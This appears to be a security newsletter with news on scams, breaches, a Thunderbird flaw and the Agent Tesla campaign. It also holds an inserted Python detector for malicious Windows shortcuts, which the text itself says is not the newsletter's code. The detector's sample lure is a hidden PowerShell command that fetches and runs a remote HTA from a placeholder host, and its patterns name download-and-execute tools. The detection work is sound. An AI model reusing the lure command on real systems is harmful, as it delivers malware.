Weekly Axis Of Easy #266
Last week’s quote, “Be yourself; everyone else is already taken,” was by Oscar Wilde. Helene is our winner! Congrats!
This Week’s Quote: “Grab them by the balls and their hearts and minds will follow.” … by ???
THE RULES: No searching up the answer, must be posted at the bottom of this post, in the comments section.
The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.
In this issue:
- Thunderbird receives a security update from Mozilla
- Software developer Connor Tumbleson reveals how someone attempted to land Upwork contracts by pretending to be him
- Scammers targeted Fortune 500s with Fake CISO LinkedIn profile
- Physician’s Business Office data theft impacts nearly 197,000 patients
- NCA chief says criminals have adopted pandemic cybercrime trends as their regular course of business
- Dark Web cybercriminals deliver Agent Tesla malware using Quantum Builder
- Supreme Court to hear lawsuits against Google, Twitter, Facebook
- Patches for high-severity vulnerabilities in Chrome 106
- Malware delivered via PowerPoint mouseover trick
- Cybercrime against SMEs is on the rise, especially account takeover fraud
- The average attacker finds weaknesses in less than 10 hours
Mozilla has disclosed a critical vulnerability in its email client, Thunderbird. In some cases the flaw allows remote takeover of the affected machine.
To make sure you are protected, stop reading now and upgrade to the latest version.
On September 14, 2022, software developer Connor Tumbleson received a rather strange email from a college student named Andrew, who kindly and very honestly told the developer that someone had hired him to pretend to be Mr. Tumbleson in a job interview. “A few days ago, this person named Maris [redacted] found me on GitHub and reached out and asked me to be his senior software engineer where my priorities will be communicating with clients,” read the email from the college junior.
A Word file was attached to the email as proof of the eerie scam. Mr. Tumbleson discovered that the document was a cheat sheet someone would use to impersonate him. It contained Mr. Tumbleson’s educational background, work history, qualifications, and information about the company the impostor was interviewing with. The email address was Mr. Tumbleson’s own with a ‘2’ appended, and the home address was a house for sale in Tampa, Florida, where Mr. Tumbleson actually lives.
Since the cheat sheet contained the date, time, and URL of the interview, Mr. Tumbleson was able to join the Zoom call where the fake Connor was expected to appear. “I quickly explained to the client that I was the real Connor Tumbleson and had not applied for the job.” He was still explaining what was happening when the fake Connor joined the call.
“The gentleman of this company was frankly amazing and allowed me to change my name, turn off my video, tweak my avatar, and stay on the call.” Once admitted to the call, fake Connor’s self-introduction was a direct copy of the cheat sheet. Mr. Tumbleson, who couldn’t stand that someone was reciting the achievements he had built up, changed his display name back, turned the camera on, interrupted, and asked what they were doing. The fake Connor immediately left the room.
Talking with the client, it turned out that the fake Connor had applied through the freelancing marketplace Upwork, which hosted a profile for a Connor Tumbleson that Mr. Tumbleson himself had never registered.
It is unknown how many fake Connor Tumblesons have landed jobs on the strength of Mr. Tumbleson’s career so far. Mr. Tumbleson said he is horrified that attempts to recruit a fake Connor Tumbleson using his name, background, and achievements are still ongoing, and he plans to continue investigating.
Someone is creating fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations, and these fake profiles are confusing search engine results. Rich Mason, the former CISO at Fortune 500 firm Honeywell, began warning his colleagues on LinkedIn about the phony profiles earlier this week. “It’s interesting the downstream sources that repeat LinkedIn bogus content as truth,” Mason said. “This is dangerous, Apollo.io, Signalhire, and Cybersecurity Ventures.”
It’s still unclear who is behind this network of fake CISOs or what their intentions may be. However, in August, security firm Mandiant told Bloomberg that hackers working for the North Korean government had been copying résumés and profiles from leading job listing platforms to land jobs at cryptocurrency firms.
KrebsOnSecurity reported that LinkedIn said its teams were actively working to take down the fake accounts and that its automated systems stop 96% of fake accounts and 99.1% of spam and scams.
Mason said LinkedIn needs to make it easier for employers to remove phony employee accounts, and that it should take employers less than two weeks to get these profiles taken down.
An attack on the Physician’s Business Office (PBO) network five months ago likely resulted in the theft of 196,573 patients’ personal information. PBO is a West Virginia-based service that manages medical practices and administers healthcare policies.
Unusual activity was discovered on PBO’s network in April 2022, which triggered a security audit. An outside digital forensics and incident response firm was engaged to assist, and it found that data had been accessed and potentially acquired without authorization.
Under the Health Insurance Portability and Accountability Act (HIPAA), PHI breaches affecting more than 500 individuals must be reported within 60 days of discovery. In its June 30 report, PBO explained its delay as the result of an “in-depth” review of the potentially affected data to identify the patients and providers involved.
The company also attributed the delay to its coordination with providers and work “to collect current mailing addresses for all potentially impacted individuals.”
Stolen data could include names, Social Security numbers, driver’s license numbers, treatment details, diagnoses, contact information, disability codes, prescription information, and health insurance account information.
Following the incident, PBO implemented several measures to strengthen its information security and prevent a recurrence.
Cybercrime trends that grew during the pandemic are now “business as usual” among offenders, says a senior investigator. Matt Horne, deputy director of investigations at the National Crime Agency (NCA), said there has been an increase in the use of crypto-assets to launder money since the Covid-19 outbreak.
In his address at the International Security Expo, which brings together the global security community at London’s Olympia, Mr. Horne stressed that law enforcement needs to pool its resources and adopt a whole-system, collaborative approach; otherwise, it will “be left behind.”
NCA figures show there are 70,000 known individuals (“nominals”) engaged in serious organized crime in the UK and 850,000 people posing a sexual risk to children.
Mr. Horne said that organized crime had adapted to a shifting landscape and was now increasing in scale and complexity. He added that law enforcement must be agile to identify and maximize technological opportunities and threats.
Researchers discovered a malware builder called Quantum Builder that is being used to deliver the Agent Tesla remote access trojan. Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar report this malware campaign features enhancements and “a shift towards LNK (Windows shortcut) files compared with similar attacks in the past.”
Quantum Builder, available for €189 a month on the dark web, generates malicious shortcut files, HTA, ISO, and PowerShell payloads to deliver next-stage malware to targeted machines.
The attack starts with spear-phishing emails containing GZIP archives that hold Windows shortcut (LNK) files. The shortcuts run PowerShell code that launches a remote HTML application (HTA), which in turn downloads and executes the Agent Tesla malware. The phishing emails are disguised as order confirmation messages from a Chinese lump and rock sugar supplier.
The researchers noted that threat actors increasingly use malware builders sold on cybercrime marketplaces to create malicious payloads for campaigns against a wide range of organizations.
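The delivery chain described above (a shortcut that runs PowerShell, which pulls a remote HTA) leaves its tell-tale command line inside the .lnk file itself, in the StringData section of the Shell Link format. The following Python is an added example, not code from Zscaler or from this newsletter: it parses the relevant fields of a .lnk file and flags the indicators a triage analyst would look for. The two sample shortcuts are constructed in memory for the demonstration (the hostname example.invalid is a placeholder), and the indicator list is a heuristic starting point, not a complete signature set.

```python
"""Triage Windows shortcut (.lnk) files for LNK -> PowerShell -> HTA delivery chains.

Added example (not Zscaler's or the newsletter's code). The two sample shortcuts
below are constructed in memory; example.invalid is a placeholder hostname.
Format reference: MS-SHLLINK (ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData).
"""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits that control which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1, 2, 4, 8
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 16, 32, 64, 128
STRING_FIELDS = (  # StringData entries appear in this fixed order when their flag is set
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping the ID list and LinkInfo."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize (2 bytes, excludes itself) + item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


# Heuristic indicators for the shortcut-to-script-host chain; extend to taste.
INDICATORS = (
    (re.compile(r"powershell|pwsh|mshta|wscript|cscript|cmd\.exe", re.I), "launches a script host"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|bypass", re.I), "hidden window / policy bypass switches"),
    (re.compile(r"mshta|\.hta\b", re.I), "HTML application (HTA) execution"),
    (re.compile(r"https?://", re.I), "remote URL embedded in shortcut"),
    (re.compile(r"downloadstring|downloadfile|iex\b|invoke-expression|invoke-webrequest|certutil|bitsadmin", re.I),
     "download-and-execute primitive"),
)
DOCUMENT_ICON = re.compile(r"acrord|winword|excel|\.pdf|\.docx?|\.xlsx?", re.I)


def triage_lnk(data: bytes) -> list:
    """Return the indicators matched by a shortcut's target path, arguments and icon."""
    f = parse_lnk_strings(data)
    target = " ".join(f.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    hits = [reason for pattern, reason in INDICATORS if pattern.search(target)]
    # A script-host target wearing a document icon is the classic lure shortcut.
    if hits and DOCUMENT_ICON.search(f.get("icon_location", "")):
        hits.append("icon masquerades as a document")
    return hits


def build_lnk(relative_path: str, arguments: str, icon_location: str = "") -> bytes:
    """Build a minimal shell link (header + StringData) for testing; no ID list or LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    strings = [relative_path, arguments]
    if icon_location:
        flags |= HAS_ICON_LOCATION
        strings.append(icon_location)
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return bytes(header) + body


# Constructed samples: a lure mimicking the campaign's order-confirmation theme, and a benign shortcut.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"Start-Process mshta 'https://example.invalid/Order_Confirmation.hta'\"",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
)
BENIGN_LNK = build_lnk(r"..\Documents\Order_Confirmation.pdf", "")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk_strings(blob).get("arguments", ""), triage_lnk(blob))
```

To run this against real files, feed `open(path, "rb").read()` to `triage_lnk`; shortcuts that carry a LinkTargetIDList or LinkInfo are handled because the parser skips those structures by their own size fields before reading the strings. The indicator regexes deliberately match on the relative path as well as the arguments, since a lure frequently points straight at powershell.exe and keeps the arguments short.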
The U.S. Supreme Court announced it will hear two cases against the social media giants Google/YouTube, Twitter, and Facebook.
Social media companies are generally exempt from liability for what their users post online under Section 230 of the Communications Decency Act, passed in 1996. Section 230 also allows companies to moderate content that violates their own standards as long as they act in “good faith.”
The two cases being heard by the Supreme Court were brought by family members of people killed in Islamic State group terrorist attacks.
Nohemi Gonzalez, a 23-year-old US citizen studying in Paris, was killed at a café during the November 2015 Paris attacks, which killed 129 other people.
The other case involves the killing of Jordanian citizen Nawras Alassaf in an Istanbul nightclub in 2017, where an Islamic State-affiliated gunman killed 39 people.
The allegation is that the platforms helped the Islamic State grow by failing to adequately moderate its content.
Patches for high-severity vulnerabilities in Chrome 106
Malware delivered via PowerPoint mouseover trick
Cybercrime against SMEs is on the rise, especially account takeover fraud
The average attacker finds weaknesses in less than 10 hours
Previously on #AxisOfEasy
If you missed the previous issues, they can be read online here:
- September 26th, 2022: Record-Breaking DDoS Attack With 25.3 Billion Requests
- September 19th, 2022: Four-Fifths Of Firms Have Been Impacted By Critical Cloud Security Incidents
- September 12th, 2022: Botnets In The Work From Home Era
- September 5th, 2022: Safety Alert For Thousands Of Tourist Planes As Flying Technology Could Be Hacked
- August 29th, 2022: PayPal Scam Uses Invoices Sent Through Their Website